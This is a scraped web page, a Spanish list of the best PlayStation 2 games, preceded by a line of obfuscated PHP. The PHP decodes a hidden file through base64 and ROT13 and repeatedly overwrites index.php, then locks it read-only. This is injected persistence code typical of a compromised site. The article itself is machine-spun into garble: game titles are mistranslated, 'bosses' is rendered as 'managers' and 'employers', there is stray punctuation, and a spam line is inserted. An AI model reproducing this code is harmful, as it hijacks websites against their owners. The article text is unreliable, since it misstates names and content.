$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Los mejores juegos de PlayStation 2 – Challenger Team

Los mejores juegos de PlayStation 2

Los mejores juegos de PlayStation 2


Oscuridad del Titán

El mejor videojuego, una obra maestra de perpetuidad y también de los pueblos, que se vuelve cada vez más impresionante con el tiempo. El modo de juego solo incluye peleas con los gerentes, que sin embargo aún no se han descubierto de una forma u otra en las extensiones bastante grandes del mundo de los videojuegos ;o. Las batallas en sí son verdaderos rompecabezas con plataformas, correr y tratar de encontrar susceptibilidades. Las dimensiones de algunos directivos son verdaderamente colosales, y realmente hay que treparlas largo y meticulosamente para clavar la espada en el tendón de Aquiles. ' tacón. Por cierto, el juego tiene un entorno fascinante de un mundo condenado, y la música cautivadora se quedará contigo. vive en tu memoria.

Shin Megami Tensei: Personaje 3

Excelente juego de rol con muchos elementos de juego únicos. Además de las peleas comunes de JRPG con monstruos y también empleadores, en Personality 3 el jugador definitivamente tendrá que ir; la universidad, tomar exámenes y descubrir exactamente cómo pasar su tiempo libre por las noches: todo esto definitivamente influirá en las cualidades del personaje. Aquí está el sistema inicial de cartas con animales movilizados que se pueden cruzar y así obtener todas las nuevas criaturas. Character 4 también se lanzó en PlayStation 2, lo que resultó ser genial. incluso mejor que su predecesor. Sin embargo, el personaje 3 tiene una ventaja significativa sobre la cuarta entrega: los fanáticos dedicados lo tradujeron perfectamente al ruso. Ofrecemos una gran colección de geniales dbz bt3 que son completamente seguros. usar.

Colina tranquila 2

Aterrador oscuro, considerado; como uno de los mejores representantes del género en; perpetuidad. La historia aquí es una verdadera obra de arte, y la parte visual con una ciudad oscura y un montón de bestias horribles es impresionante en el mejor de los casos. este día. Quiet Hill 2 es un clásico eterno que todos los sobrevivientes aterradores (y no solo) deben tocar. Sí, y en el videojuego hay nada menos que 6 finales radicalmente distintos, que se basan en las acciones del personaje a lo largo de la transmisión.

Steel Gear Solid 3: Devorador de serpientes

Acción sigilosa impecable de Hideo Kojima, el fundador de la colección Metal Gear. Los eventos enviarán al jugador a la Guerra Fría, y la acción en sí se desarrollará en bosques densos, incluyendo todo tipo de riesgos. La jugabilidad es extremadamente variada; : búsquedas ocultas, supervivencia, batallas con adversarios normales, batallas de empleadores notables y también, por supuesto, una historia poderosa y combinada. para escenas de películas. Snake Eater era en realidad calificado mejor videojuego de PlayStation 2 de 2004 por múltiples publicaciones.

 

Dios de la Segunda Guerra

La parte 2 de Adventures of the Tireless Kratos no es sin razón considerada entre los mejores y más asombrosos juegos para PlayStation 2. Este slasher no hace más que exprimir todos los jugos gráficos de la consola. Y además de una hermosa imagen, el videojuego muestra un juego lleno de adrenalina y también un montón de peleas con varios empleadores de la mitología griega antigua.

Share this post